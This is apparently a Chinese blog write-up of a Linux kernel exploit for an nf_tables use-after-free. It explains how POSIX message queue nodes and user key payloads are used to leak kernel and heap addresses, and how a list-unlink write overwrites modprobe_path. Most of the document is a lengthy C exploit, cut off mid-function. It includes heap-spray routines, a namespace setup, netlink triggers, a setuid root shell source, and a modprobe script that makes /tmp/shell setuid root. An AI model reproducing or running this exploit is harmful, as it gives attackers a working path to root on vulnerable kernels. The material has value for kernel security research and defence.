并且可以注意到他的申请参数也为GFP_KERNEL

泄漏内核地址

这里用到的是mqueue中的posix消息队列模块,该模块和msg_msg一样是IPC进程间通信的消息队列功能。

1
2
3
4
5
6
7
8
9
10
11
struct rb_node {
unsigned long __rb_parent_color;
struct rb_node *rb_right;
struct rb_node *rb_left;
} __attribute__((aligned(sizeof(long))));

/*
 * Per-priority node of a POSIX message queue.
 * NOTE(review): with three word-sized members in rb_node, msg_list.next
 * presumably sits at offset 0x18 on a 64-bit build -- confirm.
 */
struct posix_msg_tree_node {
/* Links the node into info->msg_tree. */
struct rb_node rb_node;
/* Messages of this priority; msg_insert() appends to the tail. */
struct list_head msg_list;
/* Set from msg->m_type when the node is created. */
int priority;
};

可以看到posix_msg_tree_node的next指针刚好落在了0x18这个位置。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
static int do_mq_timedsend(mqd_t mqdes, const char __user *u_msg_ptr,
size_t msg_len, unsigned int msg_prio,
struct timespec64 *ts)
{
struct fd f;
struct inode *inode;
struct ext_wait_queue wait;
struct ext_wait_queue *receiver;
struct msg_msg *msg_ptr;
struct mqueue_inode_info *info;
ktime_t expires, *timeout = NULL;
struct posix_msg_tree_node *new_leaf = NULL;
int ret = 0;
DEFINE_WAKE_Q(wake_q);

// ... ...
msg_ptr = load_msg(u_msg_ptr, msg_len);

// ... ...

if (!info->node_cache)
new_leaf = kmalloc(sizeof(*new_leaf), GFP_KERNEL);

spin_lock(&info->lock);

if (!info->node_cache && new_leaf) {
/* Save our speculative allocation into the cache */
INIT_LIST_HEAD(&new_leaf->msg_list);
info->node_cache = new_leaf;
new_leaf = NULL;
} else {
kfree(new_leaf);
}
if (info->attr.mq_curmsgs == info->attr.mq_maxmsg) {
// ... ...
} else {
// ... ...
if (receiver) {
// ... ...
} else {
// ... ...
ret = msg_insert(msg_ptr, info);
}
}
// ... ...
}

SYSCALL_DEFINE5(mq_timedsend, mqd_t, mqdes, const char __user *, u_msg_ptr,
size_t, msg_len, unsigned int, msg_prio,
const struct __kernel_timespec __user *, u_abs_timeout)
{
struct timespec64 ts, *p = NULL;
if (u_abs_timeout) {
int res = prepare_timeout(u_abs_timeout, &ts);
if (res)
return res;
p = &ts;
}
return do_mq_timedsend(mqdes, u_msg_ptr, msg_len, msg_prio, p);
}

整体流程就是首先从用户态载入消息,然后创建对应的posix_msg_tree_node结构体,将结构体放入到info中,最后插入到消息队列中。可以看到在申请posix_msg_tree_node结构体时也是使用了GFP_KERNEL标识位。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
static int msg_insert(struct msg_msg *msg, struct mqueue_inode_info *info)
{
struct rb_node **p, *parent = NULL;
struct posix_msg_tree_node *leaf;
bool rightmost = true;

p = &info->msg_tree.rb_node;
while (*p) {
parent = *p;
leaf = rb_entry(parent, struct posix_msg_tree_node, rb_node);

if (likely(leaf->priority == msg->m_type))
goto insert_msg;
else if (msg->m_type < leaf->priority) {
p = &(*p)->rb_left;
rightmost = false;
} else
p = &(*p)->rb_right;
}
if (info->node_cache) {
leaf = info->node_cache;
info->node_cache = NULL;
} else {
leaf = kmalloc(sizeof(*leaf), GFP_ATOMIC);
if (!leaf)
return -ENOMEM;
INIT_LIST_HEAD(&leaf->msg_list);
}
leaf->priority = msg->m_type;

if (rightmost)
info->msg_tree_rightmost = &leaf->rb_node;

rb_link_node(&leaf->rb_node, parent, p);
rb_insert_color(&leaf->rb_node, &info->msg_tree);
insert_msg:
info->attr.mq_curmsgs++;
info->qsize += msg->m_ts;
list_add_tail(&msg->m_list, &leaf->msg_list);
return 0;
}

可以看到在最后是将消息添加到leaf中去了,并且msg_list的next指针偏移为0x18,如果触发了uaf覆盖的话就会达成以下效果

偷图侵删

那么接下来只需要读取消息即可达到泄漏的目的

1
2
3
4
5
6
7
8
9
10
11
12
13
SYSCALL_DEFINE5(mq_timedreceive, mqd_t, mqdes, char __user *, u_msg_ptr,
size_t, msg_len, unsigned int __user *, u_msg_prio,
const struct __kernel_timespec __user *, u_abs_timeout)
{
struct timespec64 ts, *p = NULL;
if (u_abs_timeout) {
int res = prepare_timeout(u_abs_timeout, &ts);
if (res)
return res;
p = &ts;
}
return do_mq_timedreceive(mqdes, u_msg_ptr, msg_len, u_msg_prio, p);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
static int do_mq_timedreceive(mqd_t mqdes, char __user *u_msg_ptr,
size_t msg_len, unsigned int __user *u_msg_prio,
struct timespec64 *ts)
{
ssize_t ret;
struct msg_msg *msg_ptr;
struct fd f;
struct inode *inode;
struct mqueue_inode_info *info;
struct ext_wait_queue wait;
ktime_t expires, *timeout = NULL;
struct posix_msg_tree_node *new_leaf = NULL;

if (ts) {
expires = timespec64_to_ktime(*ts);
timeout = &expires;
}

audit_mq_sendrecv(mqdes, msg_len, 0, ts);

f = fdget(mqdes);
if (unlikely(!f.file)) {
ret = -EBADF;
goto out;
}

inode = file_inode(f.file);
if (unlikely(f.file->f_op != &mqueue_file_operations)) {
ret = -EBADF;
goto out_fput;
}
info = MQUEUE_I(inode);
audit_file(f.file);

if (unlikely(!(f.file->f_mode & FMODE_READ))) {
ret = -EBADF;
goto out_fput;
}

/* checks if buffer is big enough */
if (unlikely(msg_len < info->attr.mq_msgsize)) {
ret = -EMSGSIZE;
goto out_fput;
}

/*
* msg_insert really wants us to have a valid, spare node struct so
* it doesn't have to kmalloc a GFP_ATOMIC allocation, but it will
* fall back to that if necessary.
*/
if (!info->node_cache)
new_leaf = kmalloc(sizeof(*new_leaf), GFP_KERNEL);

spin_lock(&info->lock);

if (!info->node_cache && new_leaf) {
/* Save our speculative allocation into the cache */
INIT_LIST_HEAD(&new_leaf->msg_list);
info->node_cache = new_leaf;
} else {
kfree(new_leaf);
}

if (info->attr.mq_curmsgs == 0) {
if (f.file->f_flags & O_NONBLOCK) {
spin_unlock(&info->lock);
ret = -EAGAIN;
} else {
wait.task = current;

/* memory barrier not required, we hold info->lock */
WRITE_ONCE(wait.state, STATE_NONE);
ret = wq_sleep(info, RECV, timeout, &wait);
msg_ptr = wait.msg;
}
} else {
DEFINE_WAKE_Q(wake_q);

msg_ptr = msg_get(info);

inode->i_atime = inode->i_mtime = inode->i_ctime =
current_time(inode);

/* There is now free space in queue. */
pipelined_receive(&wake_q, info);
spin_unlock(&info->lock);
wake_up_q(&wake_q);
ret = 0;
}
if (ret == 0) {
ret = msg_ptr->m_ts;

if ((u_msg_prio && put_user(msg_ptr->m_type, u_msg_prio)) ||
store_msg(u_msg_ptr, msg_ptr, msg_ptr->m_ts)) {
ret = -EFAULT;
}
free_msg(msg_ptr);
}
out_fput:
fdput(f);
out:
return ret;
}

首先拿到file_inode,接着通过msg_get拿到对应的msg

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
static inline struct msg_msg *msg_get(struct mqueue_inode_info *info)
{
struct rb_node *parent = NULL;
struct posix_msg_tree_node *leaf;
struct msg_msg *msg;

try_again:
/*
* During insert, low priorities go to the left and high to the
* right. On receive, we want the highest priorities first, so
* walk all the way to the right.
*/
parent = info->msg_tree_rightmost;
if (!parent) {
if (info->attr.mq_curmsgs) {
pr_warn_once("Inconsistency in POSIX message queue, "
"no tree element, but supposedly messages "
"should exist!\n");
info->attr.mq_curmsgs = 0;
}
return NULL;
}
leaf = rb_entry(parent, struct posix_msg_tree_node, rb_node);
if (unlikely(list_empty(&leaf->msg_list))) {
pr_warn_once("Inconsistency in POSIX message queue, "
"empty leaf node but we haven't implemented "
"lazy leaf delete!\n");
msg_tree_erase(leaf, info);
goto try_again;
} else {
msg = list_first_entry(&leaf->msg_list,
struct msg_msg, m_list);
list_del(&msg->m_list);
if (list_empty(&leaf->msg_list)) {
msg_tree_erase(leaf, info);
}
}
info->attr.mq_curmsgs--;
info->qsize -= msg->m_ts;
return msg;
}

随后通过store_msg将消息发送到用户态,最后再free掉对应的msg结构体。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
void free_msg(struct msg_msg *msg)
{
struct msg_msgseg *seg;

security_msg_msg_free(msg);

seg = msg->next;
kfree(msg);
while (seg != NULL) {
struct msg_msgseg *tmp = seg->next;

cond_resched();
kfree(seg);
seg = tmp;
}
}

在释放函数中可以看到在开头位置会释放掉security但是这个是不可控的,如果不为0大概率会造成kernel panic所以要确保为0。并且可以看到这里并没有像以前那样可以用MSG_COPY来解决,并且在copy_to_user函数中会检测读取内容是否超过了堆块大小所以最多读取0x10的内容,所以只能寻求新的方法。

1
2
3
4
5
struct callback_head {
struct callback_head *next;
void (*func)(struct callback_head *head);
} __attribute__((aligned(sizeof(void *))));
#define rcu_head callback_head

值得注意的是前面提到的user_key_payload结构体的前面0x10个字节其实是如上结构体,他的前八个字节默认为0,并且func是指向user_free_payload_rcu函数的,所以保证了security为0并且可以成功泄漏出内核地址。

所以这里需要确保user_key_payload结构体紧贴posix_msg_tree_node结构体的next指针指向的位置。可以先用io_uring占位,在申请第二个expr之前释放掉,这时大概率就会挤在一起了,然后再堆喷user_key_payload即可实现。

提权

至此来看约束条件还是比较多的,并不能实现传统意义上的任意地址写,不过在以往的一篇文章中介绍过modprobe_path这一个内核全局变量。

侵删

这一步的构造方式和上述其实类似,也是通过堆喷posix_msg_tree_node结构体再通过UAF使其指向一个object,不过最后其指向的object是会被free掉的,那么紧接着堆喷user_key_payload结构体,此时一个msg_msg结构体就被两个user_key_payload结构体所裹挟了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
static inline void __list_del(struct list_head * prev, struct list_head * next)
{
next->prev = prev;
WRITE_ONCE(prev->next, next);
}

static inline void __list_del_entry(struct list_head *entry)
{
if (!__list_del_entry_valid(entry))
return;

__list_del(entry->prev, entry->next);
}

static inline void list_del(struct list_head *entry)
{
__list_del_entry(entry);
entry->next = LIST_POISON1;
entry->prev = LIST_POISON2;
}

在读取消息时会调用msg_get函数获取到msg_msg结构体,并且在获取之后紧接着就是通过list_del将其从链表中删除。可以看到其中出现了通过指针进行写入的操作(next->prev = prev; prev->next = next),这个操作其实在用户态堆的unlink中就已经接触过了。所以如果我们可以控制prev和next,就可以实现一次受限的写入(地址和值都不是完全任意的),具体要求就是保证两个指针指向的位置都是可写的。那么这里可以使用0xffff????2f706d74这样的值去写modprobe_path所在位置,最终的效果就为/tmp/????\xff\xffprobe,这里的????来自前面泄漏出来的堆地址。

exp

这里exp就直接用他的了( 因为我也不熟悉该模块所以就算自己写也会和他的大差不差 )

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
// gcc exp.c -o exp -l mnl -l nftnl -w
#define _GNU_SOURCE
#include <arpa/inet.h>
#include <sched.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <err.h>
#include <libmnl/libmnl.h>
#include <libnftnl/chain.h>
#include <libnftnl/expr.h>
#include <libnftnl/rule.h>
#include <libnftnl/table.h>
#include <libnftnl/set.h>
#include <linux/netfilter.h>
#include <linux/netfilter/nf_tables.h>
#include <linux/netfilter/nfnetlink.h>
#include <sched.h>
#include <sys/types.h>
#include <signal.h>
#include <net/if.h>
#include <asm/types.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <sys/socket.h>
#include <linux/ethtool.h>
#include <linux/sockios.h>
#include <sys/xattr.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <assert.h>
#include <netinet/in.h>
#include <stdint.h>
#include <syscall.h>
#include <mqueue.h>
#include <linux/io_uring.h>
#include <linux/keyctl.h>
#include <sys/shm.h>
#include <sys/ipc.h>
#include <sys/types.h>
#include <sys/mman.h>

#define MQUEUE_NUM 5


#define INBOUND 0
#define OUTBOUND 1
#define DESC_MAX 0x800

#define BUFFER 0x100
#define NAMELEN 0x100
#define ERROR_PREFIX "err: "

#define KEY_DESC_MAX_SIZE 40

#define PREFIX_BUF_LEN 16
#define RCU_HEAD_LEN 16

#define SPRAY_KEY_SIZE 50

#define PHYSMAP_MASK 0xffffffff00000000

#define SPRAY_SIZE 1000

#define SPRAY_NB_ENTRIES 10

uint64_t base_base;
uint64_t heap_base;
uint64_t modprobe_addr;

enum nft_trans_phase {
NFT_TRANS_PREPARE,
NFT_TRANS_ABORT,
NFT_TRANS_COMMIT,
NFT_TRANS_RELEASE
};

typedef struct
{
long mtype;
char mtext[1];
}msg;

typedef struct
{
void *ll_next;
void *ll_prev;
long m_type;
size_t m_ts;
void *next;
void *security;
}msg_header;

typedef struct
{
char name[BUFFER];
} Msg;

typedef struct
{
char iface[16];
char name[16];
char ip[16];
char netmask[16];
uint8_t idx;
uint8_t type;
uint16_t proto;
uint16_t port;
uint8_t action;
char desc[DESC_MAX];
} user_rule_t;


struct keyring_payload {
uint8_t prefix[PREFIX_BUF_LEN];
uint8_t rcu_buf[RCU_HEAD_LEN];
unsigned short len;
};

struct leak {
long kaslr_base;
long physmap_base;
};

struct fd_uring {
int fd;
struct io_uring_params *params;
};

typedef int32_t key_serial_t;

const char priv_file[] = "/tmp/shell.c\0";
const char dummy_file[] = "/tmp/dummy\0";

const char priv_context[] = "#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n\nint main(int argc, char **argv){if (geteuid() == 0){setuid(0);setgid(0);puts(\"[+] I am root\");system(\"bash\");}}\x00";
const char dummy_content[] = "\xff\xff\xff\xff";
const char new_modprobe_content[] = "#!/bin/bash\n\nchown root:root /tmp/shell\nchmod 4555 /tmp/shell\n";



static inline key_serial_t add_key(const char *type, const char *description, const void *payload, size_t plen, key_serial_t ringid) {
return syscall(__NR_add_key, type, description, payload, plen, ringid);
}

static inline long keyctl(int operation, unsigned long arg2, unsigned long arg3, unsigned long arg4, unsigned long arg5) {
return syscall(__NR_keyctl, operation, arg2, arg3, arg4, arg5);
}

void bye(char *info)
{
puts(info);
exit(-2);
}

void do_error_exit(char *info)
{
puts(info);
exit(-1);
}

void bye2(char *info, char *arg)
{
printf(info, arg);
}

/*
 * Create spray_size "user" keys in the process keyring.
 *
 * Key descriptions are numbered start, start+1, ... so that successive
 * calls can use disjoint names.  The returned array has exactly spray_size
 * entries and is indexed from 0, whatever the value of start; the original
 * code indexed it with the absolute number and wrote past the allocation
 * whenever start was non-zero.
 *
 * Exits through bye() on allocation or add_key() failure.  The caller owns
 * the returned array.
 */
key_serial_t *spray_keyring(uint32_t start, uint32_t spray_size) {
    char key_desc[KEY_DESC_MAX_SIZE];
    key_serial_t *id_buffer = calloc(spray_size, sizeof(key_serial_t));

    if (id_buffer == NULL)
        bye("calloc");

    for (uint32_t slot = 0; slot < spray_size; slot++) {
        /* The description doubles as the payload. */
        snprintf(key_desc, KEY_DESC_MAX_SIZE, "SPRAY-RING-%03du", start + slot);
        id_buffer[slot] = add_key("user", key_desc, key_desc, strlen(key_desc), KEY_SPEC_PROCESS_KEYRING);
        if (id_buffer[slot] < 0)
            bye("add_key");
    }

    return id_buffer;
}

key_serial_t *spray_keyring_list_del_purpose(uint32_t spray_size, uint64_t next, uint64_t prev, uint64_t size)
{
// next[0x8] = prev, prev[0x0] = next allocation occured at gather mqueue
char key_desc[KEY_DESC_MAX_SIZE];
key_serial_t *id_buffer = calloc(spray_size, sizeof(key_serial_t));

char temp[0x20];
memcpy(temp+0x0, &next, 8);
memcpy(temp+0x8, &prev, 8);
memcpy(temp+0x10, "12341234", 8);
memcpy(temp+0x18, &size, 8);

if (id_buffer == NULL)
do_error_exit("calloc");

for (uint32_t i = 0; i < spray_size; i++) {
id_buffer[i] = add_key("user", temp, temp, 0x20, KEY_SPEC_PROCESS_KEYRING);
if (id_buffer[i] < 0)
do_error_exit("add_key");
}

return id_buffer;
}

/*
 * Create spray_size "user" keys whose payload is the first len bytes of the
 * sequence off_18, off_20, off_28, off_30, off_38 (8 bytes each).
 *
 * len must be in 1..0x28, otherwise the program exits through bye().
 *
 * Changes from the previous version:
 *  - the staging buffer is zero-initialised and all five values are always
 *    copied, so no uninitialised stack bytes are sent (the old switch fell
 *    through in the wrong direction and skipped the leading fields for
 *    len > 8);
 *  - a snprintf() that used the binary payload as its format string, and
 *    whose result was never read, is gone;
 *  - the calloc() result is checked.
 *
 * The caller owns the returned array.
 */
key_serial_t *spray_keyring_list_overwrite_purpose(uint32_t spray_size, uint64_t len, uint64_t off_18,
        uint64_t off_20, uint64_t off_28, uint64_t off_30, uint64_t off_38)
{
    const uint64_t fields[] = { off_18, off_20, off_28, off_30, off_38 };
    char temp[0x40] = {0};
    key_serial_t *id_buffer = calloc(spray_size, sizeof(key_serial_t));

    if (id_buffer == NULL)
        do_error_exit("calloc");

    if (len == 0 || len > sizeof(fields))
        bye("add_key - assert(len <= 0x28)");

    /* Only the first len bytes are used as payload; the rest stays zero. */
    memcpy(temp, fields, sizeof(fields));

    for (uint32_t i = 0; i < spray_size; i++) {
        id_buffer[i] = add_key("user", temp, temp, len, KEY_SPEC_PROCESS_KEYRING);
        if (id_buffer[i] < 0)
            do_error_exit("add_key");
    }

    return id_buffer;
}

/*
 * Read the first 0x10 bytes of every key in id_buffer and look for one
 * whose bytes 6 and 7 are both 0xff.
 *
 * On a match the first 8 bytes are stored in the global heap_base and the
 * index of that key is returned.  If no key matches, id_buffer_size is
 * returned.  Exits through bye() when keyctl() fails.
 *
 * Compared with the previous version the byte comparison uses memcmp()
 * rather than strncmp() on a uint8_t buffer, the value is copied out with
 * memcpy() rather than through a cast pointer, and the printf() arguments
 * match their conversion specifiers.
 */
int get_keyring_leak(key_serial_t *id_buffer, uint32_t id_buffer_size) {
    static const uint8_t top_bytes[2] = { 0xff, 0xff };
    uint8_t buffer[USHRT_MAX] = {0};
    int32_t keylen;

    for (uint32_t i = 0; i < id_buffer_size; i++) {
        keylen = keyctl(KEYCTL_READ, id_buffer[i], (long)buffer, 0x10, 0);
        if (keylen < 0)
            bye("keyctl");

        if (memcmp(&buffer[6], top_bytes, sizeof(top_bytes)) == 0) {
            memcpy(&heap_base, buffer, sizeof(heap_base));
            printf("[+] leak successed, kmalloc-64 heap: 0x%llx\n",
                   (unsigned long long)heap_base);
            return i;
        }

        printf("[-] leak failed, idkval: %s\n", (const char *)buffer);
    }
    return id_buffer_size;
}

void awake_partial_keys(key_serial_t *id_buffer, uint32_t idx) {
uint8_t buffer[USHRT_MAX] = {0};
int32_t keylen;
keylen = keyctl(KEYCTL_UPDATE, id_buffer[idx], (long)buffer, 0x10, 0);
}



void release_keys(key_serial_t *id_buffer, uint32_t id_buffer_size)
{

for (uint32_t i = 0; i < id_buffer_size; i++) {
if (keyctl(KEYCTL_REVOKE, id_buffer[i], 0, 0, 0) < 0)
do_error_exit("keyctl(KEYCTL_REVOKE)");
}

free(id_buffer);
}

void release_partial_keys(key_serial_t *id_buffer, int i)
{
if (keyctl(KEYCTL_REVOKE, id_buffer[i], 0, 0, 0) < 0)
do_error_exit("keyctl(KEYCTL_REVOKE)");
}


/*
 * Write text to the file at path, reporting open/write failures with
 * perror() but never aborting.
 */
static void write_proc_file(const char *path, const char *text)
{
    int fd = open(path, O_WRONLY);

    if (fd < 0) {
        perror(path);
        return;
    }
    if (write(fd, text, strlen(text)) < 0)
        perror(path);
    close(fd);
}

/*
 * Enter new mount, user and network namespaces and map uid/gid to 0
 * inside the new user namespace.
 *
 * Each step stays best-effort as before, but failures are now reported
 * instead of being dropped (the old code would write to fd -1 without any
 * diagnostic).
 */
void unshare_setup(uid_t uid, gid_t gid)
{
    char edit[0x100];

    if (unshare(CLONE_NEWNS|CLONE_NEWUSER|CLONE_NEWNET) < 0)
        perror("unshare");

    write_proc_file("/proc/self/setgroups", "deny");

    snprintf(edit, sizeof(edit), "0 %d 1", uid);
    write_proc_file("/proc/self/uid_map", edit);

    snprintf(edit, sizeof(edit), "0 %d 1", gid);
    write_proc_file("/proc/self/gid_map", edit);
}


/*
 * Send one netlink batch that creates the IPv4 table `name` and, inside
 * it, a plain set called "set_stable" with a 1-byte key.
 *
 * Exits through err() when nl is NULL or the send fails.
 *
 * Changes from the previous version: the nftnl table object and the mnl
 * batch are released once they are no longer needed, `name` keeps its
 * const qualifier, and locals that were never read are gone.
 */
void set_stable_table_and_set(struct mnl_socket* nl, const char *name)
{
    const char *table_name = name;
    const char *set_name = "set_stable";
    uint8_t family = NFPROTO_IPV4;
    uint32_t set_id = 1;

    // a table for the sets to be associated with
    struct nftnl_table *table = nftnl_table_alloc();
    nftnl_table_set_str(table, NFTNL_TABLE_NAME, table_name);
    nftnl_table_set_u32(table, NFTNL_TABLE_FLAGS, 0);

    struct nftnl_set *set_stable = nftnl_set_alloc();
    nftnl_set_set_str(set_stable, NFTNL_SET_TABLE, table_name);
    nftnl_set_set_str(set_stable, NFTNL_SET_NAME, set_name);
    nftnl_set_set_u32(set_stable, NFTNL_SET_KEY_LEN, 1);
    nftnl_set_set_u32(set_stable, NFTNL_SET_FAMILY, family);
    nftnl_set_set_u32(set_stable, NFTNL_SET_ID, set_id);

    // serialize
    char buf[MNL_SOCKET_BUFFER_SIZE*2];
    struct mnl_nlmsg_batch *batch = mnl_nlmsg_batch_start(buf, sizeof(buf));
    struct nlmsghdr *nlh;
    int seq = 0;

    nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
    mnl_nlmsg_batch_next(batch);

    // add the table
    nlh = nftnl_table_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch),
                                      NFT_MSG_NEWTABLE, family,
                                      NLM_F_CREATE|NLM_F_ACK, seq++);
    nftnl_table_nlmsg_build_payload(nlh, table);
    nftnl_table_free(table);
    mnl_nlmsg_batch_next(batch);

    // add set_stable
    nlh = nftnl_set_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch),
                                    NFT_MSG_NEWSET, family,
                                    NLM_F_CREATE|NLM_F_ACK, seq++);
    nftnl_set_nlmsg_build_payload(nlh, set_stable);
    nftnl_set_free(set_stable);
    mnl_nlmsg_batch_next(batch);

    nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
    mnl_nlmsg_batch_next(batch);

    if (nl == NULL) {
        err(1, "mnl_socket_open");
    }

    printf("[+] setting stable %s and set\n", table_name);
    if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch),
                          mnl_nlmsg_batch_size(batch)) < 0) {
        err(1, "mnl_socket_send");
    }

    /* The batch bookkeeping object is heap-allocated; buf itself is on the stack. */
    mnl_nlmsg_batch_stop(batch);
}

void set_trigger_set_and_overwrite(struct mnl_socket* nl, const char *name, const char *set_name)
{
char * table_name = name;
uint8_t family = NFPROTO_IPV4;
uint32_t set_id = 1;
struct nftnl_expr * exprs[128];
int exprid = 0;
struct nlmsghdr * nlh;

struct nftnl_set * set_trigger = nftnl_set_alloc();

nftnl_set_set_str(set_trigger, NFTNL_SET_TABLE, table_name);
nftnl_set_set_str(set_trigger, NFTNL_SET_NAME, set_name);
nftnl_set_set_u32(set_trigger, NFTNL_SET_FLAGS, NFT_SET_EXPR);
nftnl_set_set_u32(set_trigger, NFTNL_SET_KEY_LEN, 1);
nftnl_set_set_u32(set_trigger, NFTNL_SET_FAMILY, family);
nftnl_set_set_u32(set_trigger, NFTNL_SET_ID, set_id);
exprs[exprid] = nftnl_expr_alloc("lookup");
nftnl_expr_set_str(exprs[exprid], NFTNL_EXPR_LOOKUP_SET, "set_stable");
nftnl_expr_set_u32(exprs[exprid], NFTNL_EXPR_LOOKUP_SREG, NFT_REG_1);
nftnl_set_add_expr(set_trigger, exprs[exprid]);
exprid++;

char buf[MNL_SOCKET_BUFFER_SIZE*2];

struct mnl_nlmsg_batch * batch = mnl_nlmsg_batch_start(buf, sizeof(buf));
int seq = 0;

nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
mnl_nlmsg_batch_next(batch);

nlh = nftnl_set_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch),
NFT_MSG_NEWSET, family,
NLM_F_CREATE|NLM_F_ACK, seq++);
nftnl_set_nlmsg_build_payload(nlh, set_trigger);
nftnl_set_free(set_trigger);
mnl_nlmsg_batch_next(batch);

nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
mnl_nlmsg_batch_next(batch);

if (nl == NULL) {
err(1, "mnl_socket_open");
}

if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch),
mnl_nlmsg_batch_size(batch)) < 0) {
err(1, "mnl_socket_send");
}

printf("[+] triggering UAF set and overwrite *(prevchunk+0x18)\n");
}

/*
 * Restrict process `pid` to the single CPU `cpu_n`.
 * Exits through do_error_exit() when sched_setaffinity() fails.
 */
void set_cpu_affinity(int cpu_n, pid_t pid) {
    cpu_set_t mask;
    int rc;

    CPU_ZERO(&mask);
    CPU_SET(cpu_n, &mask);

    rc = sched_setaffinity(pid, sizeof(mask), &mask);
    if (rc >= 0)
        return;

    do_error_exit("sched_setaffinity");
}

/*
 * Send spray_size messages of 0x28 bytes, taken from msgptr, to the queue
 * mqdes at priority 1.  A failed mq_send() is reported with perror() and
 * the loop carries on.
 *
 * The locals that were declared but never read have been removed.
 */
void spray_mqueue(mqd_t mqdes, char *msgptr, int spray_size)
{
    const unsigned sdprio = 1;

    printf("[*] spraying mqueue...\n");
    for (int i = 0; i < spray_size; i++) {
        if (mq_send(mqdes, msgptr, 0x28, sdprio) != 0)
            perror(ERROR_PREFIX "mq_send");
    }
}

/*
 * Receive up to gather_size messages from mqdes.  For every message that
 * is received, its first 8 bytes are turned into base_base (minus a fixed
 * offset) and modprobe_addr (base_base plus a fixed offset), so the last
 * received message determines the final values.  Always returns 0.
 */
int gather_mqueue(mqd_t mqdes, int gather_size)
{
int priority = 0;
char msg[BUFFER];
printf("[*] gathering mqueue...\n");
for(int i=0; i<gather_size; i++)
{
if (mq_receive(mqdes, (char*) &msg, BUFFER, NULL) != -1)
{

/*
 * NOTE(review): `!=` binds tighter than `&`, so this is parsed as
 * value & (0xffffffff00000000 != 0xffffffff00000000), i.e. value & 0.
 * The condition is therefore always false and bye() is never reached.
 * Parenthesising the mask would activate the check for every received
 * message -- confirm that is intended before changing it.
 */
if(*((uint64_t *)msg) & 0xffffffff00000000 != 0xffffffff00000000)
bye("[-] can't leak base... \n");

base_base = *((uint64_t *)msg) - 0x51af80;
